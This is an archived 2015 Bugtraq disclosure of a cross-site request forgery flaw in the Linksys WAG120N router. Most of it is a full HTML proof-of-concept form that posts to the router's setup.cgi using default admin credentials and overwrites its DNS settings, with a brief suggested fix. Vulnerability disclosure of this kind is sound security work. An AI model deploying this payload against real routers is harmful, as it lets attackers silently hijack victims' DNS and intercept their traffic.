| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 23 Aug 2015 14:13:58 +0200 From: "DonVallejo ." <j.v.vallejo@...il.com> To: bugtraq@...urityfocus.com Subject: Cross site request forgery vulnerability in Linksys WAG120N Hello all, i want to share a problem that i found with Linksys router WAG120N. It could be possible to modify router's configuration when a user visit a webpage with an specific <form> (it is a similar problem that i sent some days ago with Comtrend routers: http://www.securityfocus.com/archive/1/536232). Linksys WAG120N doesn’t accept the configuration if it is sent in the url by method GET. In this case it is necessary to send the configuration by method POST, so we will need to create an HTML with a <form> with the parameters that we want to send to the router. We will put router’s default values and we will change only user and password and DNS addresses: <html> <head> </head> <body> <form name="setup" method="POST" action="http://admin:admin@....168.1.1/setup.cgi"> ... ... <INPUT type="text" name="PoeUserName" value="admin" maxLength="62" size="26" > <INPUT type="password" name="PoePasswd" value="admin" maxLength="43" size="26" > ... ... <input type="hidden" name="c4_static_dns0_" value="1.2.3.4"> <input type="hidden" name="c4_static_dns1_" value="5.6.7.8"> <input type="hidden" name="c4_static_dns2_" value="9.10.11.12"> ... ... <input type="submit"> </form> </body> </html> If a user visit this HTML, when the form is submitted (it could be submitted automatically with javascript) the router configuration is changed (in this example DNS addresses given by DHCP are configured but any configuration could be modified). The complete HTML code is in the end. I am almost sure other models of different manufacturers can be configured in similar ways. From my point of view, routers interfaces should only accept new incoming connections to a welcome page. In that welcome page, a session key should be generated and kept while the session is open. In this way a user could not go directly to critical configuration menus. For example, a user could not go directly to the menu to configure DNS addresses, because he must go to the welcome page first, where a session key is generated, assigned and validated when critical configurations are going to be changed. Mitigation: Internet Explorer doesn’t accept username and password in the URL of the form action (I mean the syntax http://user:password@...ain.com). Currently chrome and firefox are accepting username and password in the URL. I don’t know about other browsers. Complete HTML: <html> <head> </head> <body> <form name="setup" method="POST" action="http://admin:admin@....168.1.1/setup.cgi"> <INPUT type="radio" name="wan_multiplex" value="llc"> <INPUT type="radio" name="wan_multiplex" value="vc"> <INPUT type="radio" name="pppoa_multiplex" value="llc"> <INPUT type="radio" name="pppoa_multiplex" value="vc"> <INPUT type="text" class="num" maxlength="5" size="5" value="" name="wan_pcr"> <INPUT type="text" class="num" maxlength="5" size="5" value="" name="wan_scr"> <INPUT type="radio" name="wan_autodetect" value="enable"> <INPUT type="radio" name="wan_autodetect" value="disable"> <INPUT type="text" class="num" maxlength="3" size="5" value="0" name="wan_vpi"> <INPUT type="text" class="num" maxlength="5" size="5" value="38" name="wan_vci"> <INPUT type="radio" name="bridged_dhcpenable" value="dhcp"> <INPUT type="radio" name="bridged_dhcpenable" value="fixedip"> <INPUT type="text" name="wan_ip_1" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_ip_2" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_ip_3" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_ip_4" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_mask_1" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_mask_2" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_mask_3" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_mask_4" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_gw_1" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_gw_2" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_gw_3" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_gw_4" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_dns1_1" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_dns1_2" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_dns1_3" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_dns1_4" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_dns2_1" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_dns2_2" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_dns2_3" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="wan_dns2_4" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="PoeUserName" value="admin" maxLength="62" size="26" > <INPUT type="password" name="PoePasswd" value="admin" maxLength="43" size="26" > <INPUT type="text" name="PoeService" value="" maxLength="43" size="26" > <INPUT type="radio" name="pppoeDODC" value="pppoeDODC"> <INPUT type="text" class="num" name="poeIdleTime" value="5" maxLength="4" size="4" > <INPUT type="radio" name="pppoeDODC" value="pppoeKA"> <INPUT type="text" class="num" name="pppoeRedialTime" value="30" maxLength="3" size="4" > <INPUT type="text" name="bpas_ip_1" value="" class="num" maxlength="3" size="3" > <INPUT type="text" name="bpas_ip_2" value="" class="num" maxlength="3" size="3" > <INPUT type="text" name="bpas_ip_3" value="" class="num" maxlength="3" size="3" > <INPUT type="text" name="bpas_ip_4" value="" class="num" maxlength="3" size="3" > <INPUT type="text" name="bpaUserName" value="" maxLength="62" size="26" > <INPUT type="password" name="bpaPasswd" value="" maxLength="43" size="26" > <INPUT type="radio" name="bpaDODC" value="bpaDODC"> <INPUT type="text" name="bpaIdleTime" value="5" class="num" maxLength="2" size="4" > <INPUT type="radio" name="bpaDODC" value="bpaKA"> <INPUT type="text" name="bpaRedialTime" value="30" class="num" maxLength="3" size="4" > <INPUT type="text" name="hostname" value="" maxlength="30" size="26"> <INPUT type="text" name="domainname" value="" maxlength="62" size="26" > <INPUT type="text" name="mtu_size" value="1492" class="num" maxLength="5" size="5" > <INPUT type="text" name="lan_ip_1" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="lan_ip_2" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="lan_ip_3" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="text" name="lan_ip_4" value="" class="ipnum" maxlength="3" size="3"> <INPUT type="radio" name="lan_dhcp" value="enable"> <INPUT type="radio" name="lan_dhcp" value="disable"> <INPUT type="radio" name="lan_dhcp" value="relay"> <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_1"> <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_2"> <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_3"> <INPUT type="text" class="ipnum" maxLength="3" size="3" value="" name="dhcpserver_ip_4"> <INPUT class="ipnum" maxlength="3" size="3" value="100" name="dhcp_start"> <INPUT type="text" class="num" maxlength="3" size="3" value="50" name="dhcp_num"> <INPUT type="text" class="num" maxlength="4" size="4" value="0" name="dhcp_lease"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_1"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_2"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_3"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns0_4"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_1"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_2"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_3"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns1_4"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_1"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_2"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_3"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="static_dns2_4"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_1"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_2"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_3"> <INPUT type="text" class="ipnum" maxlength="3" size="3" value="" name="wan_wins_4"> <INPUT type="checkbox" name="auto_dls" value="auto_dls"> <input type="hidden" name="h_ethwan_enable" value="disable"> <input type="hidden" name="c4_wan_ip_" value=""> <input type="hidden" name="c4_wan_mask_" value=""> <input type="hidden" name="c4_wan_gw_" value=""> <input type="hidden" name="c4_wan_dns1_" value=""> <input type="hidden" name="c4_wan_dns2_" value=""> <input type="hidden" name="c4_lan_ip_" value="192.168.1.1"> <input type="hidden" name="c4_dhcpserver_ip_" value=""> <input type="hidden" name="c4_static_dns0_" value="1.2.3.4"> <input type="hidden" name="c4_static_dns1_" value="5.6.7.8"> <input type="hidden" name="c4_static_dns2_" value="9.10.11.12"> <input type="hidden" name="c4_wan_wins_" value=""> <input type="hidden" name="c4_bpas_ip_" value=""> <input type="hidden" name="h_bpaDODC" value="bpaDODC"> <input type="hidden" name="h_wan_encapmode" value="pppoa"> <input type="hidden" name="h_wan_multiplex" value="llc"> <input type="hidden" name="h_pppoa_multiplex" value="llc"> <input type="hidden" name="h_wan_qostype" value="ubr"> <input type="hidden" name="h_dsl_mode" value="a"> <input type="hidden" name="h_wan_autodetect" value="enable"> <input type="hidden" name="h_bridged_dhcpenable" value="dhcp"> <input type="hidden" name="h_pppoeDODC" value="pppoeDODC"> <input type="hidden" name="h_mtu_type" value="auto"> <input type="hidden" name="h_lan_mask" value="0"> <input type="hidden" name="h_lan_dhcp" value="enable"> <input type="hidden" name="h_time_zone" value="+0 2"> <input type="hidden" name="h_auto_dls" value="disable"> <input type="hidden" name="PppoeUserName" value=""> <input type="hidden" name="PppoePasswd" value=""> <input type="hidden" name="PppoeService" value=""> <input type="hidden" name="PppoaUserName" value="admin"> <input type="hidden" name="PppoaPasswd" value="admin"> <input type="hidden" name="oldip" value="192.168.1.1"> <input type="hidden" name="h_upgrade_langpkt" value="1"> <input type="hidden" name="todo" value="save"> <input type="hidden" name="this_file" value="Setup.htm"> <input type="hidden" name="next_file" value="Setup.htm"> <input type="hidden" name="message" value=""> <input type="hidden" name="h_wps_cur_status" value=""> <input type="submit"> </form> </body> </html>
Powered by blists - more mailing lists